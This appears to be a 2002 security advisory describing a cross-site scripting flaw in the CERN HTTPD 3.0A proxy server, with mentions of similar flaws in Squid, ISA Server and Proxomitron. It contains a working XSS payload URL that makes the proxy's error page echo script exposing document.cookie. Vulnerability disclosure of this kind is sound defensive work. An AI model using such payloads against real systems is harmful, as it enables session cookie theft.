CERN Proxy Server: Cross-Site Scripting Vulnerability

by Nikola Strahija on August 13th, 2002

Affected: CERN HTTPD 3.0A
http://www.w3.org/Daemon/Activity.html

Vendor Status: CERN httpd team ([email protected]) was notified on Aug 10, 2001 but they did not respond.


Exploit:

http://nonexistenthost.google.com/document.write(document.cookie)

========================================================


Error Message


Fatal Error 500
Can't Access Document:
http://nonexistenthost.google.com/document.write(document.cookie).


Reason: Can't locate remote host: nonexistenthost.google.com.


...snip...
========================================================

Similar problems have been found in Proxomitron Naoko-4 BetaFour,
Microsoft ISA Server and Squid 2.4 DEVEL4.





Best regards,
--
Hiromitsu Takagi
http://staff.aist.go.jp/takagi.hiromitsu/



